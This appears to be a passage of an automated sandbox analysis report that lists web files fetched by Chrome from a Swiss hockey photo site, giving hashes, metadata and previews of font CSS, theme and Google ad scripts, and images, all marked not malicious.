                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3783
                                                                                                                                            Entropy (8bit):7.736821223868421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AAB2D52B0867A521E89FAFE4B4BB1FB4
                                                                                                                                            SHA1:1CAB9B29B906F97C01E54096C15AD63900EB5CAA
                                                                                                                                            SHA-256:99E0CD4A9CD372E4F8868C1B7D1502403201E68941E4FC46E075375594A37423
                                                                                                                                            SHA-512:996468D433EECF3A6FCE787FB4F3FBAC5ABBB641DF491A13C09A6B6C7CD2C2BA9BC17C79AA1066E734A1769C065D968808237470A46EC77E37DD0D816AD84470
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."..................................................................................a...0......C..m.J>f&.u(.H.p2X<...P.m@..Qd.Iy]....=.Ll^h.SE.yC.....k...B..m..N...!3!.=.....e...k..+.-omj...mM.r........rD..C..*.v..W.x=...;?.....N5.!..Dzb..D.....6.......J^.>.@.7JV../.A..p.....A.j....].W........Lv.....#\...@.K..<.w....H,..L....'...........................!1....A."2..........m.Rz]~.}..D..Y.^x]R......WR.9..\x..%.g.J..e..........P..D....../......`..yu._R..5q^....g9..j....k....._.Q.\#..ybh.@D].S'..lbq"R..*.^.....U...S.....".g.u=..#...TT^Y.X....+. ..m....!...........i..mI$O..d..,.......`! ......Q........IM...v .g.#.2.Q3i.F#f..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1022), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1022
                                                                                                                                            Entropy (8bit):4.866603574635615
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:281D5C47C77AF909753C30FFA0F609BC
                                                                                                                                            SHA1:E5D8149FE3C5A2EBDCAB1708994B7BC3DB1E0122
                                                                                                                                            SHA-256:BC5D9646ABDC1BBD28DB5BF2CC94DFF4E55F5DD00BBE3395273E8600344ED0ED
                                                                                                                                            SHA-512:59684DA58D1A602B30C0C87C3B8EB0ACF1C1C17D92F1145C0C7E5AC79A757CE37A91257F15978C8A4DA0707CFD24BA795AF41F937D3E8B4B66E8251206F12BF5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/inc/compatibility/elementor/assets/js/colormag-elementor.min.js?ver=4.1.12
                                                                                                                                            Preview:!function(t){var e=function(t,e){var n=elementorFrontend.utils.swiper,o=t.find(".tg-trending-news");new n(o,{speed:parseInt(o.attr("data-speed")),delay:parseInt(o.attr("data-transition-time")),loop:!0,autoplay:!0,navigation:{nextEl:".swiper-button-next",prevEl:".swiper-button-prev"}})},n=function(t,e){var n=elementorFrontend.utils.swiper,o=t.find(".tg-module-grid--style-7 .swiper-container"),a="true"===o.attr("data-autoplay");new n(o,{speed:parseInt(o.attr("data-speed")),delay:parseInt(o.attr("data-transition-time")),loop:!0,navigation:{nextEl:".swiper-button-next",prevEl:".swiper-button-prev"},autoplay:a}).then((function(t){"true"===o.attr("data-pause_on_hover")&&o.on({mouseenter:function(){t.autoplay.stop()},mouseleave:function(){t.autoplay.start()}})}))};t(window).on("elementor/frontend/init",(function(){elementorFrontend.hooks.addAction("frontend/element_ready/ColorMag-Posts-Trending-News.default",e),elementorFrontend.hooks.addAction("frontend/element_ready/ColorMag-Posts-Grid-7.de
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 250 x 252, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16876
                                                                                                                                            Entropy (8bit):7.968398243346427
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:5D9DB81B29358358B92C01BE6D2DA3B4
                                                                                                                                            SHA1:9406D79D288C880620ECC72D1EAFE0D9AE8F1036
                                                                                                                                            SHA-256:3CF95BFFCE5DBA80045ADCC792E88B5C4FA9CD04A4B6850267E0256F939F2DE5
                                                                                                                                            SHA-512:E94B84A7001988B7CD90D2B852DE685FC370DD17F6BDA04D064E81664708B422F1762285D090B490558EECB8E3FD75881CF831FF9EC8101AFF4AED0BCB0B708A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR..............ly.....PLTE...........................................[[[........................................eee..........................///..................\\\...............................................iii..................VVV........................###...,,,ggg...uuu...888...@@@......eee...OOO...^^^....eee......rrr...................................................................................................................a...:J...7C...8.............A......|||...........!............kl......""#.........jjj[Z[S..........".. .......r7@...OPPJJJX,,QHN-..[..{.....#..CBC........ ....dm:::...............i...........@..bbb.....!...UUU...............%12.... ...GS...|.... +....&000......))).mx......I.......!......i...jq...ttt....kt.....................s....A....tRNS...................!$'''++.03:::;;;<>?BGHIIJORSSWXXZ\abiiijmnpsvvwx||..............................................................................pHYs.................eXIfII*....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):829
                                                                                                                                            Entropy (8bit):5.393005769081461
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0AD452773B7FB4F5665232FD055E1024
                                                                                                                                            SHA1:B9CF846C848954F23F0F2B233CE1C07194CCDBDA
                                                                                                                                            SHA-256:448DE31AC0D1DCB2E2A5F6FCB891C4FA37F05CE20AAB34D372A3AC714053E5E4
                                                                                                                                            SHA-512:98AD025D5CECBB96D16BCDFF5DCEEB18806D8D96254074D6BE8A4C7679245DA3B1B0316371FE09F94BADD644453E30A3A34D3F7BE11E2EF6CB118C7703FCEC30
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.google.com/recaptcha/api2/aframe
                                                                                                                                            Preview:<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="K0TCEhFsPmO1sQ647nUiww">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha */ try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")||0)+1);localStorage.setItem("rc::h",'1736177785312');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "*");}catch(b){}</script></body></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4795
                                                                                                                                            Entropy (8bit):7.820388156284189
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:44CB61B9FAEF12538156047FC003374A
                                                                                                                                            SHA1:2AA7CEBC05B192FB89C6192AA38290AB6E9C86B7
                                                                                                                                            SHA-256:410A3D0D85F1D1AAA04EFB9F5A3E4E36E9AE5BA2E6DF1AE5CBDD76DA36B473F8
                                                                                                                                            SHA-512:B192BDB64693C8705CD5DE305174F7B7AC68F5B7A7E33B4E25C1FCC9EB0AF7A291CA6AFBD5182A797D2D72C64265FB24380CA8BA4348A77EA8B1B99F007D46AC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.........Z...."................................................................................1.7 .O.B.....L.iaF.8.._$:H@.(....F.....3)Pf......*..sEUN....E...:..=./i...S.W........., ..f.yb......zxNn...9..~..)|.w..3`k.ll9.u.C"..q.n.h.x..-z.Dx.o...W.S.mr...fw.".S-..s.I.^.....Y..........*I".9... .YI....iE.:..H.I.s.f..Y....TN..1........&...........................!....1"2A....................X.{...7.......K...O.....^9..._...>8..dvqsq......Fa[............+M.i.....I...O..\5.1./...ZoM.$g7".7.x.A.|mmjf...x....k.sM....[q.v..g.a<m...|..S.-.i%0...t{(Z.M.%,..Gs.L.....0..K...9.U...f.Fl?.).....C`g..R.F.G.`......$..^.R|O.g..,O.#...-.{.^=J.gX.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):61
                                                                                                                                            Entropy (8bit):4.323962444639199
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A07180E65BA4D17FC6AC8D6BC0003DF8
                                                                                                                                            SHA1:0E89A9BD153A4F21B45129450408A88769FD571A
                                                                                                                                            SHA-256:C45C8B81CCFCBC08127B74787D1B5974078756233DE947986C357E28ED8F13AC
                                                                                                                                            SHA-512:2139690DD0EA4F194A05E2B596A3CFADF700B1DDD56D0063793FB1E5E8AFFE40B4983F23744F581D3A496ACB801A5DBA348E42F86486323E5F597956CE33974B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://pagead2.googlesyndication.com/pagead/osd.js?fcd=true
                                                                                                                                            Preview:(function(window,document){}).call(this,this,this.document);.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16346
                                                                                                                                            Entropy (8bit):7.980435099359904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C709FC49087EA854467D1767CDA7BE14
                                                                                                                                            SHA1:3565488C1511AC31240B737368865E10E821453E
                                                                                                                                            SHA-256:5126A48C7A1644B84A0CC57FDDE098DC203B67B235F024D4DF79C5758ED082F7
                                                                                                                                            SHA-512:88682903AC5CC79A85A12EE3A72E11519C76495B48C512C27D99589824C2B7350CD78B765540EC5468D6EC6D74B587D793E77618B7EEEAF524D9BDCF23E35DC8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_3050.jpg
                                                                                                                                            Preview:RIFF.?..WEBPVP8X..............VP8 .>.......*....>.@.I...........dn...K.x...C...N..W.oL.A....]..?..g..9_..Z~....v.A......OX.L?.A?.u*...w.0.n...Q..........-...........I....;.....................Oz.A?.... .?:.......v.'../.{..Y...S.....?.=..a...G....9t.k|.......V.N.]d.*K.{..8..H&.p&l...16X.&...b....".]...b....p..K..,=`'..."..^......?...|....W.\.../....}....r....8..C.....S..3..#.v</..7.3$..gZ.*..Z.....z...>.%. )...`.R.3h.....:._6.l.ea.R?XY.lF.Ii&.fmE.e.X6ef.{6..\...n. .cq.3....fj...-......@.X..)R.7...Tz.p..=2...f.(O9...>b..X7#.....7.o(...........r......z...;=p...r...........JL.._,.w.,.....b..Y..T.W....o........N../.[...[Q..*Y.P3{:.U.w,.UPc9*...k.(....V.d..,....{.....D.H.!.O....5.+.:Oz.1@8?.hfb.."..Q,.V5^.4L.K!?.f.]...A{W..|C.#....Gt.5z.p..f..-K(=.....5..J...}L.c..9.o.Tqc...U.b.=./.m....Q.....Q.|..@..........H...DqpT/.#*.g..U..6C.4.e?{"Dm.....:..=P..{.V0..v...7.W...k.[....#..^..gZ....j.<....:.P.....*......V....b..P...,..yE..."E..b6.g.H...b..Z..2..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):34528
                                                                                                                                            Entropy (8bit):7.992507234936707
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7233B4BC045032BB57C8E08AB4D9FBC2
                                                                                                                                            SHA1:83B20A4AF457AD8DC7CB6047109912957E65DD2C
                                                                                                                                            SHA-256:2789CD3FD3FD1DC282A0F5D4D400D02F14640F566C0A4FD02CFDC2E37205BB4E
                                                                                                                                            SHA-512:B52D541E2F7A582F4D794E27BF5CFE5EFFFCB94CAD6C6C3D8D27223C627C631DEC814CFE451AA6BCD48E5270E1C3047125A61F569A5C0D0EA472E1384D925048
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:800/h:445/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2023/09/IMG_5111.jpg
                                                                                                                                            Preview:RIFF...WEBPVP8X..............VP8 ....p9...* ...>.H.K%.#*&...@..M.>.....Y.....h.......3..../.?..N....O......C.{.K......v7.....pq.u...G._...z....g]).+.7..O.?.=.?....I....?...w.._?..O......w.....9...'.Nq7...}..'.G......?z.+.o......g....,...g...?`8.x/..^....K...k=p.W...7.....u?..K.C....HM >....O.?.g.9_.a.>/....V..*....=.Uj.A[.."*f.....IN....R..s.8H~\.......+?.I..}..Y..m45l`!$i.k..W3R.!...FK..g&J"........@r.S.B.z.d.!..0..7(9...s..B..W..7...(4S..1...y.n.........}.~..8...uv...+....... .........(-.m.`...g........f.)...9.3#A.X.....J8-/R......^f.>.V0L..&....Wf...L.Rn.t.U9...s.`/[.../..=1...p..v.{l..n.C..].i.!.V.v.H....d...L.5.&.1.....%........r./...la.....n......G..Z.....(...o..<.D.y.,...o..!..........w......z..;.2.2!XH|...|R.M.g.L~........f..b>g.k.my.'w...D..././....=2..&.....m.t.../...u.....S.!.l....v....N.g..F>..!.l......r....):S.{.#@...F..O4-..m*%..j8.s..<Q.{...I...q....T....zC.|/.O......0 S../....?.b\F.1KM...g...h..K.`....$......q|@_..i.xW...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):21416
                                                                                                                                            Entropy (8bit):7.988287684663061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A0B1BBDE269927E2B0E85CC8DBB09CAD
                                                                                                                                            SHA1:7F900F6109605E26CC490D16D32A3FDE9C8E6918
                                                                                                                                            SHA-256:D4C8564BCFEF895098991CFF03400844AA9A65EDF85B2CD6A75ADD64BD7FC4BA
                                                                                                                                            SHA-512:AD9DB3D99BCE1E6995085BFFEC1C4FE6DA76928701B8173BEB8A21D2E54399706611C62E6B3B1E17713494124F6EFD50B35AF8E620B7BCC394A8D8356F748783
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:600/h:417/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2025/01/IMG_0873.jpg
                                                                                                                                            Preview:RIFF.S..WEBPVP8X........W.....VP8 .R......*X...>.H.K..)..s+y...enP.99..B...l.;..nm..%....;.-go..+...y.....o...'.....M..7..@?}...h....>..k.........w.??u....H......?..s.5.s................o.._.......u............u....t..).TL.g<w..u.......f(.YNMK-....l.A.$".C...N.........".K...).SF+.sosX..C.X&.+.(u....|.k...m..u.{Y...P@......r.hjs.j.6S...:..8.N....gfJ...b(......Y.O.C.K..D..P5$.F.Yr\...Q$T..&2......$s}...JM4..p.=l.....+DY.Xj...*.iC;:..5...]..a.<9..1FMm...}...59j.G...^..e.1....=.4[..HV...#..-.qy..?...K..l .....b...T(SV.E..t6.b....G..]....mB..........Yr....u...........E.J.*^.psI..V..>.o..l...Ox.......2.b.&.M..F...2^.%..'%~p=...#....&..'3..N.....1R...xdt..J....tJ.Y.)XD...Nv.f.b.....t..B...!\..S.q.......,..r..(.D.S%.g...J.-..*....1..$}Ht+M..%.P......9g....S-]...b....).K..[.....a.6i.-z...GQp.._E;6....W......R:.>.5.;..q.y.......ci..#..B....M.TmF..i.8..!#.^..w~..A$.._:.......S......p.j...:..:Q?p...oq..n...{E3G=.Z...`.......>?*..4R....w...O...8..J.Q.P...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65107
                                                                                                                                            Entropy (8bit):7.986250625034896
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0C100FAFEA748F1BEAD7D6A7EAD3F6C1
                                                                                                                                            SHA1:EA3D7F4C73608F96357E9F0D1FF5C3634A0E412E
                                                                                                                                            SHA-256:357A68C32208DE9990B27A09E7A13A7AF00A8F5CBB27A943EC80BB609F845C73
                                                                                                                                            SHA-512:703CDF278DE6102AFE9510DAC5DE6B3B17C9550987FAEA904C858B6F6AB351F52F35E12D2BCF9F9E2E440782951FDE684AEE7BBDF5C68351406DECE11930E0C2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||......... ..".................................................................................R..0..p&4.X.2)Y2]Y...).Z.L......@. ....I 8.FcV..v<.R..YW........Uj..E.S.6.......{:..z/J....k.._"H).f.I.$#.).Z.Z..kZ3....5y.!.SlUoWc...5.......x.n.3"Z*...3...SB.....F....<..T.:.@./4......N.=.K[..w0....,...!...c\.<...,.8V..[(...Jf{!..[.g$..Mpu.a.....Y.j=....rC.".N.I..7]0.s...;.EV.v.c\WU-.cAM.(U.U...v.d\..E:xQ..J!d.....]...{a...m...X..>Er....q..r..9gS..c..[.E.D)qd..cr.|[*k.a.+......u..-..!`..wH-'8.\./.)..n...$..`.r..>..B..VN..C.hZ.AJm@....(m.a........~V...fBB4..)..52....(..k......(...b..i..i./.6.,!.)..I~...1....Y.s#...24d..R...o.cN!.S.DF%*E
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2586)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):21466
                                                                                                                                            Entropy (8bit):5.529112648370971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A148E2C4DE864172DC940B3A59F5A831
                                                                                                                                            SHA1:162079DDB5E172B4AAF0EF040A4F37B2EFF98BEB
                                                                                                                                            SHA-256:E28FB7C8A98CE5D06DEB98333A6B01242D3598FD7BDE6178D438B99E5CE34D06
                                                                                                                                            SHA-512:F8B48BF0138DFEC3BBA817E1921F968F3BE364C019214A92AA2934AFCE22356FD6D820DEAC341C8B5A412FE7E7237520FB9B5116D9A47D676B22DE65D8753F19
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/client/qs_click_protection_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';var aa=Object.defineProperty;function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.prototype=b.prototype;a.N=b.prototype;a.prototype=new c;a.prototype.constructor=a;a.O=function(d,f,e){for(var g=Array(arguments.length-2
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3004
                                                                                                                                            Entropy (8bit):7.812798366496602
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E642A871ADF38E95ED124D8B127152F5
                                                                                                                                            SHA1:4851352BD654983204F0AC2B990051585B3AE48C
                                                                                                                                            SHA-256:FF24FA1B6EE48A832BEA4295CCEAAAB9E4DC775422DE564EEFD91A54F69F322D
                                                                                                                                            SHA-512:25AB61DA0C117DECA51678E792AC7762C230411BA0141725CCC3A39DF8B028E70BD0D396462B38D1CC9076DE247743E0A5A8E9287B25AA2754A0FEAA40CB5860
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/02/NQ3A3596.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .........*..Z.>.@.I%..!+W....b;...z<~.{.8s?..%;."~g..............O1?.........:b.........w$.\.CY{.....[.G..........'.....x.h..O`...H.......I./.,m....<Z-v.J.`.g..0&.u...>/..u.....a..M.C7...........3...'o4S./.]."......2eJ..g3.#F..~..........~..9.v"%X....=.....-..VZ-.s9hl.....L.._.3.`..x5..Is........>n...w`....M9..._h...ek ........9#.&}._.......|.U..p...........I.[J...O._B............7;...{.pkR...j.BY..[-.L.....I..r$.9FT}....Ev......X/v...1N|[.n..\..>3..p:."m5...aH.~....A.L...}.I.l.` 4....I..\....u6).hM.D....,.....V.....Vz.\'.cP.._Y.F.......}Z........rp[...S...,....\R.;b.d5~....rfg......\b.a......h5.J.P..G/........@:\Z.2$..W............2{... .?."q..o&CO...|.d....0.I...b..<..c....W....].O]u...}......L.......!.....Rq.o....$....2.$XXG.TR.<.....0R.Y.(..<Z....Fb.1.}..z..."..P.....y.......1..;..)....S...|g=.A.T6U..`((>J..vR...W..W..J71...+.f.s.].y\......J.+..@k.m..P...._/Q.).Q....u...8 .edb.Zk..6......U...P5Tv+.=l.hpz.F.R..f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16958
                                                                                                                                            Entropy (8bit):7.9810481357395595
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9CEEE9B0A73FD5CD4275CE432618EF06
                                                                                                                                            SHA1:84939BD68CF0A0985D9AB113D4C6F231F9FC0073
                                                                                                                                            SHA-256:55D76E689E5D0BF63BD34B74DCE1FD471EA663A39A83F6FC6939A5A0C4100F9C
                                                                                                                                            SHA-512:F01AEFFF78B1D36C400C48EF329199AA05F67CBA863534E182A5C0014C2185DB2297B5E41AAED85C539FFAA3C48C250010D759F647C8E320D6BF4E93B7CCDDC5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2021/04/4Y0A4352.jpg
                                                                                                                                            Preview:RIFF6B..WEBPVP8X..............VP8 VA..0....*....>.@.J%..$..M....M..".....1X.A.q.?............/S._;.,~.3..'......?.6y........k.....k.s...W.w...y..3.o.w..I...v..3..N.}....g.o.......P.ky..o...=..7.w.?|...3.s...zG.w.....o...}......O..........[......H_W...e..........u.....?v........,S.mv7......KsF...(2H.=.9d..p5...u..U-7.ep..9..1,d.)..%.(y...~U...0.T... .c...S......qi.b.....J....|...GS'..A....l..%.....!...OR..+..{.Z....../i.I...5....,.....3....1?.B.z.Y3.._.E-hz8...H................5Y_p.*...9.]......Ya!\....=~..gl.[..)...R..(.T..G..+].iS..A..n;.<.D.=..w..a.....~am...w..+-r.V..l..B<...........B.R.-.....$),F.5...Hw.`h..H1...U!...XW.].-.Fl....M.f..n.vD.-.Z...]H.9S.....K.G...#.Gq..s..A.....~..t|wb!..{.SG5..H..syL;H....)..C..... n.......=i<....^J.y..1....S..`.!Ss.7.9.....r.9.=:p.Y:=..L5.."h...~.]X../..Yz...7.:..(...`P.0{..H..EG......?cwmnT$M.TEDp.]...{x..}.m...............u..x....k .#.........`~.AQ.[....[d....V..V.p.}..fC.;..)..P.V...j).@.]+...bc..d2..g...e....pS
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12963
                                                                                                                                            Entropy (8bit):7.943221283741441
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:792E43A86A127E7F8CC58ACC36273475
                                                                                                                                            SHA1:2821A0696B402B3EBE0422FDB001A979E857D3DB
                                                                                                                                            SHA-256:9105678A4E2B6CC28ACFB0BD7729CFC2D067E10D48E30BFFBD7851F2E1F6F6F4
                                                                                                                                            SHA-512:F3D7F024ADBD3E314A7E496F7A6A51C1399A461B6E797287269B9C28471BDEE6BA5B4B7416DAB1F28E28A5650B07BA79F7C644CE29B47A7D5491C161FE06A1A2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C......................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq.........C......................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq................."...................................................................................9...$)@.5[@q..9...lt..it....r..\.Pm....V3N.0....l...<.U';....;.......3.._..ir[.O).......PR....].......c.X%.p....k.O..k.%...U..*u..}.........4.P....J.8a.t..;......4..d.WQ..o...C...mU'.x..+.=.RP..&F.'.....D....#......J.!.5a.P.....y..b.....`.rN...c..R....FlnB._.....SHf.]....|qn......LTW.x...]....D<......~./.#.....K.:....y...r...H.AUpl.... Z.....n..M.L.U.u.M.......c..=...N.w....}^..._+.|.B@..E....R6..i..i.....w#n.N%...C....A.....{RL...}.k.EC.5s...NG..&...FB4.QR.R1...cV..J....C.b.bZ+.`.:[Z; e.=fY..Sx.3^}..x6t$."....._........p;.N..OB......)j.....Q.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13243), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13243
                                                                                                                                            Entropy (8bit):5.3385425334409105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:022AEC5868CA2E030A5F4AF394F4461C
                                                                                                                                            SHA1:F418FA13CA8BD86AE3765DFDDBA2158EADC5DD07
                                                                                                                                            SHA-256:B43FE778B5BF49FE034832708487036BE8A933F62E4900211754A01890C76B6E
                                                                                                                                            SHA-512:29B883A114132158E32FD5C13F68E688A4FABD8C6F8DAB51D20ED41530E63D9F37917634806625D2DA55AF0ED7BF934D388D7AE288D0FEDCB1FFB2C70AE8F767
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
